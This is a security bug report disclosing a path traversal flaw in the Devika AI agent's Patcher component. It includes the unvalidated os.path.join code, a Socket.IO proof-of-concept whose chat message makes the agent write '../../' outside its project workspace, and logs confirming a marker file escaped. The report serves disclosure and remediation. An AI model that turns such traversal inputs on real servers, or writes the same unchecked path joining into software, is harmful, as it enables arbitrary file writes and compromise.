[Bug] Patcher Agent path traversal vulnerability

[Ro1ME]

Describe the bug

CRITICAL SECURITY VULNERABILITY: The Patcher Agent's save_code_to_project function contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.

Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File: src/agents/patcher/patcher.py:74
Affected Function: Patcher.save_code_to_project
Entry Point: Socket.IO user-message event (action=bug)

Root Cause: The function constructs file paths using user-controlled input without proper boundary validation:

# Line 74 - VULNERABLE CODE
file_path = os.path.join(project_path, file_name)  # No path validation
with open(file_path, 'w') as f:
    f.write(code)

Security Impact:

• Arbitrary File Write: Write files anywhere on the server filesystem
• Code Execution: Overwrite Python modules or system files
• Data Exfiltration: Write sensitive data to web-accessible directories
• Persistence: Plant backdoors in startup scripts

How To Reproduce

Steps to reproduce the behavior (example):

Prerequisites

1. Start Devika server:

   cd devika
   python3 -m venv venv
   source venv/bin/activate  # On Windows: venv\Scripts\activate
   pip install -r requirements.txt
   python app.py

2. Access web UI at http://localhost:1337

3. Create a new project via the UI

Steps to reproduce the behavior

1. Connect to Socket.IO endpoint:

   import socketio
   
   sio = socketio.Client()
   sio.connect('http://localhost:1337')

2. Create baseline project file:

   # First message: create a normal file
   sio.emit('user-message', {
       'message': 'Fix bug: create bootstrap.py',
       'project_name': 'cbdscan-bug-demo'
   })
   
   # Wait for completion...

3. Trigger Patcher agent with path traversal:

   # Second message: path traversal attack
   sio.emit('user-message', {
       'message': 'Fix bug in file ../../devika_patcher_escape.txt',
       'project_name': 'cbdscan-bug-demo'
   })

4. Verify file escaped project workspace:

   # Check that file exists outside project directory
   ls data/devika_patcher_escape.txt
   cat data/devika_patcher_escape.txt
   # Output: DEVIKA_PATCHER_LIVE_POC

Expected behavior

• File paths should be validated and normalized before writing
• Paths containing .. should be rejected or sanitized
• All file operations should be confined to the project workspace
• Absolute paths should be rejected

Screenshots and logs

Backend Logs:

[2026-04-10 04:14:03] Agent: Patcher
[2026-04-10 04:14:03] State: completed
[2026-04-10 04:14:03] Terminal: vim bootstrap.py
[2026-04-10 04:14:03] Output: print('bootstrap')

[2026-04-10 04:14:06] Agent: Patcher
[2026-04-10 04:14:06] State: completed
[2026-04-10 04:14:06] Terminal: vim ../../devika_patcher_escape.txt
[2026-04-10 04:14:06] Output: DEVIKA_PATCHER_LIVE_POC
[2026-04-10 04:14:06] WARNING: File written outside project workspace!

Validation Evidence:

{
  "mode": "bug",
  "project_name": "cbdscan-bug-demo",
  "project_root": "data/projects/cbdscan-bug-demo",
  "baseline_project_file": "data/projects/cbdscan-bug-demo/bootstrap.py",
  "baseline_project_file_exists": true,
  "escape_target": "data/devika_patcher_escape.txt",
  "escape_target_exists": true,
  "escape_target_within_project_root": false,
  "escape_target_content": "DEVIKA_PATCHER_LIVE_POC"
}

File System Evidence:

data/
├── projects/
│   └── cbdscan-bug-demo/
│       └── bootstrap.py              ✓ Expected location
└── devika_patcher_escape.txt         ❌ ESCAPED PROJECT WORKSPACE

Configuration

- OS:  Windows
- Python version: 3.10
- Node version: 18.0.0
- bun version: 0.1.0
- search engine: google
- Model: gpt-4

Additional context

Attack Execution Flow:

User Message (Socket.IO)
    ↓
Agent.subsequent_execute(action=bug)
    ↓
Patcher.execute()
    ↓
Patcher.save_code_to_project(code, "../../escape.txt")
    ↓
File written outside workspace ❌